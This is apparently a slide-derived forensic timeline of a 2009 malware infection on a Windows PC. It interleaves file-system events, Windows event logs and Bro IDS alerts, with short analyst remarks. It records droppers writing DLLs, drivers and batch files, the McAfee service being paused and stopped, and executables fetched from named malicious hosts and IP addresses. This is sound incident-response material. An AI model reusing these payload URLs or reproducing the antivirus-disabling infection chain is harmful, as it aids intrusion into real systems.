program-02/19/09 9:50:13 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 9:50:13 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 9:50:14 created senekaklpapjct.dat C:\\WINDOWS\SYSTEM32\senekaklpapjct.dat Data ASCII & Binary Code\Library ! Bad signature File, Archive02/19/09 9:50:23 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 9:54:48 accessed index.dat http://deskwx.weatherbug.com/WeatherWindow/WeatherWindow.html?lvl=0&zip=43204&con1=111&sunr=1235045940&suns=1235085120&ut=1235055278&stat=KTZR&L1=535&ver=6.07&camera_id=&ccamzip=<a=<at=<az=&sed=0&lpt=1235048003&rnd=19912&&&&vcw=451&lvw=1210334133&lvd=1209989319&dosp=0&UA1=506&UA5=506&zcode=Z5264&showgutsads=1&screen_x=1152&screen_y=804&lvr=&lvu=&wpt=&A2=170&lvh=&wat=1235047907&A1=50500&dsr=506&dsu=506&dssp=-1&dspm=-1&pmls=1234184569&D3=3&UA3=-1&UA11=&UA15=&L4=23&UA16=&ui=1&n=506267455&alid=0&u=&LRR=&L3=OHHistory\Daily -02/19/09 9:54:50 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/25667@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=20.30&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=170&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=20.30&WO3=0&WO4=83.00&Z3=43204&History\Daily -02/19/09 9:54:52 accessed index.dat http://pub.weatherbug.com/RealMedia/ads/adstream_sx.cgi/www.wbug.com/HM/26299@lb1?_RM_HTML_KEYWORDZ3_=43204&_RM_HTML_KEYWORDWO1_=20.30&_RM_HTML_KEYWORDL2_=Columbus&_RM_HTML_KEYWORDL3_=OH&_RM_HTML_KEYWORDHO1_=0.50&_RM_HTML_KEYWORDPC_=Z5264&A1=50500&A2=170&D1=2&D3=3&FC1=111&FC2=4&FC3=40&HO1=0.50&HO4=Mixed Trace.&L1=535&L2=Columbus&L3=OH&L4=23&N=506267455&Nav1=HM&Nav2=HM_Unknown&PC=Z5264&S2=&S3=0&SP1=&SP2=&SP5=-1&TW3=&UA1=506&WO1=20.30&WO3=0&WO4=83.00&Z3=43204&History\Daily -02/19/09 9:55:38 created [email protected][1].txtfc.webmasterpro.de/ Cookies -02/19/09 9:55:46 accessed prun.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\prun.tmp Windows Temporary Windows * Executable File, Archive02/19/09 9:55:48 created rqRKEUkK.dll C:\\WINDOWS\SYSTEM32\rqRKEUkK.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:55:48 modified rqRKEUkK.dll C:\\WINDOWS\SYSTEM32\rqRKEUkK.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:55:48 written rqRKEUkK.dll C:\\WINDOWS\SYSTEM32\rqRKEUkK.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 9:55:49 accessed vtUkhiHb.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\vtUkhiHb.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 9:55:49 created vtUkhiHb.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\vtUkhiHb.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 9:55:49 modified vtUkhiHb.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\vtUkhiHb.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive
no=HTTP_Malware na=NOTICE_EMAIL es=node00.0 sa=164.107.xxx.177 sp=1818/tcp da=77.74.48.107 dp=80/tcp method=GET url=http://childhe.com/pas/apstpldr.dll.html?affid\=177047&uid\=&guid\=D294B3372EFC4D4CA6C6DDD12F79C20A msg=164.107.xxx.177\ ->\ 4a56334f3f65d45d90aa15c1bd2f3484\ http://childhe.com/pas/apstpldr.dll.html?affid\=177047&uid\=&guid\=D294B3372EFC4D4CA6C6DDD12F79C20A\ (hashed\ from\ the\ Team\ Cymru\ malware\ hash\ registry) sub=4a56334f3f65d45d90aa15c1bd2f3484 tag=@83-10576-5e4041
![Page 11: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/11.jpg)
02/19/09 9:55:49 written vtUkhiHb.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\vtUkhiHb.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 9:55:54 bro application/x-dosexec GET http://rs263gc.rapidshare.com/files/198761582/winsinstall.exe02/19/09 9:58:18 created [email protected][1].txt 85.17.166.208/ Cookies -02/19/09 10:00:03 created RUNDLL32.EXE-5DB16EF8.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5DB16EF8.pf02/19/09 10:01:20 created cbXQiFxw.dll C:\\WINDOWS\SYSTEM32\cbXQiFxw.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:01:21 modified cbXQiFxw.dll C:\\WINDOWS\SYSTEM32\cbXQiFxw.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:01:21 written cbXQiFxw.dll C:\\WINDOWS\SYSTEM32\cbXQiFxw.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:01:23 bro application/x-dosexec02/19/09 10:01:25 created ojaocbok.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ojaocbok.sys Device Driver Code\Executable Match File, Archive02/19/09 10:01:25 modified ojaocbok.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ojaocbok.sys Device Driver Code\Executable Match File, Archive02/19/09 10:01:25 written ojaocbok.sys C:\\WINDOWS\SYSTEM32\DRIVERS\ojaocbok.sys Device Driver Code\Executable Match File, Archive
02/19/09 10:01:26 uh-oh...02/19/09 10:01:26 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-21-57765512-1263358170-1248344978-1385 COMPUTER: HACKEDPC DESCRIPTION: The irzylwcf service was successfully sent a start control. -02/19/09 10:01:26 created irzylwcf C:\\WINDOWS\irzylwcf ! Bad signature File, Archive02/19/09 10:01:36 accessed RUNDLL32.EXE-5C21FBBF.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5C21FBBF.pf02/19/09 10:01:36 created RUNDLL32.EXE-5C21FBBF.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5C21FBBF.pf02/19/09 10:01:36 written RUNDLL32.EXE-5C21FBBF.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5C21FBBF.pf02/19/09 10:01:36 modified RUNDLL32.EXE-5C21FBBF.pf C:\WINDOWS\Prefetch\RUNDLL32.EXE-5C21FBBF.pf02/19/09 10:01:41 created romxwcenas.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\romxwcenas.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:01:41 modified romxwcenas.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\romxwcenas.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:01:41 written romxwcenas.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\romxwcenas.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:01:42 accessed romxwcenas.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\romxwcenas.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:01:45 accessed ROMXWCENAS.TMP-3639D719.pfC:\WINDOWS\Prefetch\ROMXWCENAS.TMP-3639D719.pf02/19/09 10:01:45 created ROMXWCENAS.TMP-3639D719.pfC:\WINDOWS\Prefetch\ROMXWCENAS.TMP-3639D719.pf02/19/09 10:01:45 written ROMXWCENAS.TMP-3639D719.pfC:\WINDOWS\Prefetch\ROMXWCENAS.TMP-3639D719.pf02/19/09 10:01:45 modified ROMXWCENAS.TMP-3639D719.pfC:\WINDOWS\Prefetch\ROMXWCENAS.TMP-3639D719.pf02/19/09 10:01:57 accessed SXAEWRMCON.TMP-234ED43A.pfC:\WINDOWS\Prefetch\SXAEWRMCON.TMP-234ED43A.pf02/19/09 10:01:57 created SXAEWRMCON.TMP-234ED43A.pfC:\WINDOWS\Prefetch\SXAEWRMCON.TMP-234ED43A.pf02/19/09 10:01:57 written SXAEWRMCON.TMP-234ED43A.pfC:\WINDOWS\Prefetch\SXAEWRMCON.TMP-234ED43A.pf02/19/09 10:01:57 modified SXAEWRMCON.TMP-234ED43A.pfC:\WINDOWS\Prefetch\SXAEWRMCON.TMP-234ED43A.pf02/19/09 10:02:01 created swxaoermnc.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\swxaoermnc.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:02:01 modified swxaoermnc.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\swxaoermnc.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:02:01 written swxaoermnc.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\swxaoermnc.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:02:04 accessed swxaoermnc.tmp C:\\Documents and Settings\smith.99999\Local Settings\Temp\swxaoermnc.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:02:04 created wvUmjIbx.dll C:\\WINDOWS\SYSTEM32\wvUmjIbx.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:02:04 modified wvUmjIbx.dll C:\\WINDOWS\SYSTEM32\wvUmjIbx.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:02:04 written wvUmjIbx.dll C:\\WINDOWS\SYSTEM32\wvUmjIbx.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:02:08 accessed SWXAOERMNC.TMP-316E61E9.pfC:\WINDOWS\Prefetch\SWXAOERMNC.TMP-316E61E9.pf02/19/09 10:02:08 created SWXAOERMNC.TMP-316E61E9.pfC:\WINDOWS\Prefetch\SWXAOERMNC.TMP-316E61E9.pf02/19/09 10:02:08 written SWXAOERMNC.TMP-316E61E9.pfC:\WINDOWS\Prefetch\SWXAOERMNC.TMP-316E61E9.pf02/19/09 10:02:08 modified SWXAOERMNC.TMP-316E61E9.pfC:\WINDOWS\Prefetch\SWXAOERMNC.TMP-316E61E9.pf02/19/09 10:02:11 created jkkHBTJD.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\jkkHBTJD.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 10:02:11 modified jkkHBTJD.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\jkkHBTJD.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 10:02:11 written jkkHBTJD.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\jkkHBTJD.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 10:02:12 accessed jkkHBTJD.bat C:\\Documents and Settings\smith.99999\Local Settings\Temp\jkkHBTJD.bat Batch Code\Executable * NDOS Batch to MemoryFile, Archive02/19/09 10:02:12 created mcrh.tmp C:\\WINDOWS\SYSTEM32\mcrh.tmp Windows Temporary Windows Match File, Archive02/19/09 10:02:17 accessed NMOXWAESRC.TMP-0868916F.pf C:\\WINDOWS\Prefetch\NMOXWAESRC.TMP-0868916F.pf Unknown File, Deleted, Archive, Not Indexed02/19/09 10:02:17 created NMOXWAESRC.TMP-0868916F.pf C:\\WINDOWS\Prefetch\NMOXWAESRC.TMP-0868916F.pf Unknown File, Deleted, Archive, Not Indexed02/19/09 10:02:17 modified NMOXWAESRC.TMP-0868916F.pf C:\\WINDOWS\Prefetch\NMOXWAESRC.TMP-0868916F.pf Unknown File, Deleted, Archive, Not Indexed02/19/09 10:02:17 written NMOXWAESRC.TMP-0868916F.pf C:\\WINDOWS\Prefetch\NMOXWAESRC.TMP-0868916F.pf Unknown File, Deleted, Archive, Not Indexed02/19/09 10:02:26 bro application/x-dosexec GET http://thaexp.cn/ex/a.php02/19/09 10:02:27 modified mcrh.tmp C:\\WINDOWS\SYSTEM32\mcrh.tmp Windows Temporary Windows Match File, Archive02/19/09 10:02:27 written mcrh.tmp C:\\WINDOWS\SYSTEM32\mcrh.tmp Windows Temporary Windows Match File, Archive02/19/09 10:02:29 bro application/x-dosexec GET http://77.93.75.147/db/upd105320.dll?setid=irq4&affid=177047&uid=2C211880FE9611DD818B177047CFFFFF&guid=D294B3372EFC4D4CA6C6DDD12F79C20A&rid=pfobnf
02/19/09 10:02:29 mcafee is paused...sigh02/19/09 10:02:29 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The McAfee McShield service entered the paused state. -02/19/09 10:02:29 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The McAfee McShield service was successfully sent a stop control. -02/19/09 10:02:29 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The McAfee McShield service entered the stopped state. -02/19/09 10:02:30 created VRT140.tmp C:\\WINDOWS\Temp\VRT140.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:02:30 accessed gcnogcva.sys C:\\WINDOWS\SYSTEM32\DRIVERS\gcnogcva.sys Device Driver Code\Executable Match File, Archive02/19/09 10:02:30 created gcnogcva.sys C:\\WINDOWS\SYSTEM32\DRIVERS\gcnogcva.sys Device Driver Code\Executable Match File, Archive02/19/09 10:02:30 modified gcnogcva.sys C:\\WINDOWS\SYSTEM32\DRIVERS\gcnogcva.sys Device Driver Code\Executable Match File, Archive02/19/09 10:02:30 written gcnogcva.sys C:\\WINDOWS\SYSTEM32\DRIVERS\gcnogcva.sys Device Driver Code\Executable Match File, Archive02/19/09 10:02:32 accessed VRT140.tmp C:\\WINDOWS\Temp\VRT140.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:02:32 modified VRT140.tmp C:\\WINDOWS\Temp\VRT140.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:02:32 written VRT140.tmp C:\\WINDOWS\Temp\VRT140.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:02:33 bro application/x-dosexec GET http://thaexp.cn/dll/al.txt02/19/09 10:02:34 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2284/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/ex/a.php msg=application/x-dosexec\ GET\ http://thaexp.cn/ex/a.php tag=@83-10576-60334502/19/09 10:02:34 bro no=HTTP_Malware na=NOTICE_EMAIL es=node00.0 sa=164.107.xxx.177 sp=2284/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/ex/a.php msg=164.107.xxx.177\ ->\ dc9f67ae1d175386625c97fcf22c77ab\ http://thaexp.cn/ex/a.php\ (hashed\ from\ the\ Team\ Cymru\ malware\ hash\ registry) sub=dc9f67ae1d175386625c97fcf22c77ab tag=@83-10576-60334502/19/09 10:02:34 modified xccef090131.exe C:\\WINDOWS\SYSTEM\xccef090131.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:02:34 written xccef090131.exe C:\\WINDOWS\SYSTEM\xccef090131.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:02:34 modified xccefb090131.scr C:\\WINDOWS\SYSTEM32\inf\xccefb090131.scr Win NT Screen Saver Code\Executable Match File, Archive02/19/09 10:02:34 written xccefb090131.scr C:\\WINDOWS\SYSTEM32\inf\xccefb090131.scr Win NT Screen Saver Code\Executable Match File, Archive02/19/09 10:02:35 bro application/x-dosexec GET http://vipinstall.8800.org/stat/down/adx.exe02/19/09 10:02:36 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2287/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/dll/al.txt msg=application/x-dosexec\ GET\ http://thaexp.cn/dll/al.txt tag=@83-10576-60367d02/19/09 10:02:36 accessed VRT13F.TMP-19B35236.pf C:\WINDOWS\Prefetch\VRT13F.TMP-19B35236.pf02/19/09 10:02:36 created VRT13F.TMP-19B35236.pf C:\WINDOWS\Prefetch\VRT13F.TMP-19B35236.pf02/19/09 10:02:36 written VRT13F.TMP-19B35236.pf C:\WINDOWS\Prefetch\VRT13F.TMP-19B35236.pf02/19/09 10:02:36 modified VRT13F.TMP-19B35236.pf C:\WINDOWS\Prefetch\VRT13F.TMP-19B35236.pf02/19/09 10:02:37 created 143.tmp C:\\WINDOWS\SYSTEM32\143.tmp Windows Temporary Windows Match File, Archive02/19/09 10:02:39 created VRT141.TMP-153583A6.pf C:\WINDOWS\Prefetch\VRT141.TMP-153583A6.pf
02/19/09 10:02:40 bummer...02/19/09 10:02:40 logged SysEvent.Evt EVENT ID: 7000 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The zmzfozjg service failed to start due to the following error: %%317 -02/19/09 10:02:44 created xccwinsys.ini C:\\WINDOWS\xccwinsys.ini Initialization Windows ! Bad signature File, Archive02/19/09 10:02:48 accessed VRT141.TMP-153583A6.pf C:\WINDOWS\Prefetch\VRT141.TMP-153583A6.pf02/19/09 10:02:48 written VRT141.TMP-153583A6.pf C:\WINDOWS\Prefetch\VRT141.TMP-153583A6.pf02/19/09 10:02:48 modified VRT141.TMP-153583A6.pf C:\WINDOWS\Prefetch\VRT141.TMP-153583A6.pf02/19/09 10:02:50 created xccef090131.exe C:\\WINDOWS\SYSTEM\xccef090131.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:02:50 created phqghume.sys C:\\WINDOWS\SYSTEM32\DRIVERS\phqghume.sys Device Driver Code\Executable Match File, Archive02/19/09 10:02:50 modified phqghume.sys C:\\WINDOWS\SYSTEM32\DRIVERS\phqghume.sys Device Driver Code\Executable Match File, Archive02/19/09 10:02:50 written phqghume.sys C:\\WINDOWS\SYSTEM32\DRIVERS\phqghume.sys Device Driver Code\Executable Match File, Archive02/19/09 10:02:51 created lgate[1].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\lgate[1].htmWeb Page Document ! Bad signature File, Archive, Not Indexed02/19/09 10:02:52 accessed lgate[1].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\lgate[1].htmWeb Page Document ! Bad signature File, Archive, Not Indexed02/19/09 10:02:52 accessed xccefb090131.scr C:\\WINDOWS\SYSTEM32\inf\xccefb090131.scr Win NT Screen Saver Code\Executable Match File, Archive02/19/09 10:02:52 created xccefb090131.scr C:\\WINDOWS\SYSTEM32\inf\xccefb090131.scr Win NT Screen Saver Code\Executable Match File, Archive02/19/09 10:02:52 modified 143.tmp C:\\WINDOWS\SYSTEM32\143.tmp Windows Temporary Windows Match File, Archive02/19/09 10:02:52 written 143.tmp C:\\WINDOWS\SYSTEM32\143.tmp Windows Temporary Windows Match File, Archive02/19/09 10:02:52 modified lgate[1].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\lgate[1].htmWeb Page Document ! Bad signature File, Archive, Not Indexed02/19/09 10:02:52 written lgate[1].htm C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\lgate[1].htmWeb Page Document ! Bad signature File, Archive, Not Indexed02/19/09 10:02:54 accessed irzylwcf C:\\WINDOWS\irzylwcf ! Bad signature File, Archive02/19/09 10:02:54 accessed xccdf16_090131a.dll C:\\WINDOWS\xccdf16_090131a.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:02:54 accessed xccdfb16_090131.dll C:\\WINDOWS\SYSTEM32\inf\xccdfb16_090131.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:02:54 created xccdf16_090131a.dll C:\\WINDOWS\xccdf16_090131a.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:02:54 created xccdfb16_090131.dll C:\\WINDOWS\SYSTEM32\inf\xccdfb16_090131.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:02:54 modified irzylwcf C:\\WINDOWS\irzylwcf ! Bad signature File, Archive02/19/09 10:02:54 modified xccdf16_090131a.dll C:\\WINDOWS\xccdf16_090131a.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:02:54 modified xccdfb16_090131.dll C:\\WINDOWS\SYSTEM32\inf\xccdfb16_090131.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:02:54 written irzylwcf C:\\WINDOWS\irzylwcf ! Bad signature File, Archive02/19/09 10:02:54 written xccdf16_090131a.dll C:\\WINDOWS\xccdf16_090131a.dll Dynamic Link Library Code\Library Match File, Archive02/19/09 10:02:54 written xccdfb16_090131.dll C:\\WINDOWS\SYSTEM32\inf\xccdfb16_090131.dll Dynamic Link Library Code\Library Match File, Archive
02/19/09 10:02:55 another strange service fails to start...
GET http://85.17.166.133/dwn/klite9.dll?sid=C854505B4F080F0F000D54585E5E595D5E4F1F545B365C365836085B51363A0C1B1F000A0C4939080A02495A4F0A000D542D5B505D2B5A5A5E5B2C2F2A5D2D5D2A285F2A5F2D2D2D585B2F5E502A5B59284F081D545B2A5B58585151592F2C505F58582D2D5158512B585E5E595D5E2A2F2F2F2F2F4F1E1D545E585C580A5A5B5E59584F0B00545B58594F04061B1901000D54001B185D4F1B0C1F000D54585959515D69A101
![Page 12: legend time activity name path/details](https://reader030.vdocument.in/reader030/viewer/2022013018/61d0cf0504243638ea4d819e/html5/thumbnails/12.jpg)
02/19/09 10:02:55 logged SysEvent.Evt EVENT ID: 7000 EVENT TYPE: ERROR EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The aylnlfdx service failed to start due to the following error: %%317 -02/19/09 10:02:56 created ge[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\ge[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:02:56 modified imapi.exe C:\\WINDOWS\SYSTEM32\imapi.exe Windows Executable Code\Executable File, Archive02/19/09 10:02:57 logged SysEvent.Evt EVENT ID: 7035 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: S-1-5-18 COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service was successfully sent a start control. -02/19/09 10:02:57 accessed AccessProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\AccessProtectionLog.txtText Document File, Archive02/19/09 10:02:57 accessed BufferOverflowProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\BufferOverflowProtectionLog.txtText Document Match File, Archive02/19/09 10:02:57 modified AccessProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\AccessProtectionLog.txtText Document File, Archive02/19/09 10:02:57 modified BufferOverflowProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\BufferOverflowProtectionLog.txtText Document Match File, Archive02/19/09 10:02:57 written AccessProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\AccessProtectionLog.txtText Document File, Archive02/19/09 10:02:57 written BufferOverflowProtectionLog.txt C:\\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection\BufferOverflowProtectionLog.txtText Document Match File, Archive02/19/09 10:02:58 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the running state. -02/19/09 10:02:58 accessed ge[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\ge[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:02:58 created 145.tmp C:\\WINDOWS\SYSTEM32\145.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:02:58 modified ge[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\ge[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:02:58 written ge[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\0BSM01W8\ge[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:02:58 written services.exe C:\\WINDOWS\services.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:02:59 bro application/x-dosexec GET http://thaexp.cn/met/ge.txt02/19/09 10:02:59 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2293/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/met/ge.txt msg=application/x-dosexec\ GET\ http://thaexp.cn/met/ge.txt tag=@83-10576-60436502/19/09 10:02:59 created em[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\em[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:02:59 modified verclsid.exe C:\\WINDOWS\SYSTEM32\verclsid.exe Windows Executable Code\Executable File02/19/09 10:03:00 accessed em[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\em[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:03:00 modified 145.tmp C:\\WINDOWS\SYSTEM32\145.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:03:00 modified em[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\em[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:03:00 written 145.tmp C:\\WINDOWS\SYSTEM32\145.tmp Windows Temporary Windows * Executable File, Archive02/19/09 10:03:00 written CcEvtSvc.exe C:\\WINDOWS\SYSTEM32\CcEvtSvc.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:03:00 written em[1].txt C:\\Documents and Settings\smith.99999\Local Settings\Temporary Internet Files\Content.IE5\X5RWIZXC\em[1].txtText Document * Executable File, Archive, Not Indexed02/19/09 10:03:01 bro no=HTTP_Malware na=NOTICE_EMAIL es=node00.0 sa=164.107.xxx.177 sp=2293/tcp da=211.95.79.6 dp=80/tcp method=GET url=http://thaexp.cn/met/ge.txt msg=164.107.xxx.177\ ->\ c83e4a32d0f6b2233b43ed3596766627\ http://thaexp.cn/met/ge.txt\ (hashed\ from\ the\ Team\ Cymru\ malware\ hash\ registry) sub=c83e4a32d0f6b2233b43ed3596766627 tag=@83-10576-60436502/19/09 10:03:02 bro 209.205.196.18 GET http://209.205.196.18/em.txt02/19/09 10:03:02 bro no=ConnectionWithSpamHausDropNet na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2295/tcp da=209.205.196.18 dp=80/tcp msg=164.107.xxx.177\ had\ a\ connection\ with\ a\ SpamHaus\ DROP\ list\ host tag=@83-10576-60451c02/19/09 10:03:02 bro application/x-dosexec GET http://209.205.196.18/em.txt02/19/09 10:03:02 bro no=HTTP_IncorrectFileType na=NOTICE_ALARM_ALWAYS es=node00.0 sa=164.107.xxx.177 sp=2295/tcp da=209.205.196.18 dp=80/tcp method=GET url=http://209.205.196.18/em.txt msg=application/x-dosexec\ GET\ http://209.205.196.18/em.txt tag=@83-10576-60451c02/19/09 10:03:04 created CcEvtSvc.exe C:\\WINDOWS\SYSTEM32\CcEvtSvc.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:03:09 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The IMAPI CD-Burning COM Service service entered the stopped state. -02/19/09 10:03:09 modified CcEvtSvc.exe C:\\WINDOWS\SYSTEM32\CcEvtSvc.exe Windows Executable Code\Executable Match File, Archive02/19/09 10:03:10 logged SysEvent.Evt EVENT ID: 7036 EVENT TYPE: INFORMATION EVENT CATEGORY: SID: COMPUTER: HACKEDPC DESCRIPTION: The Application Layer Gateway Service service entered the stopped state. -
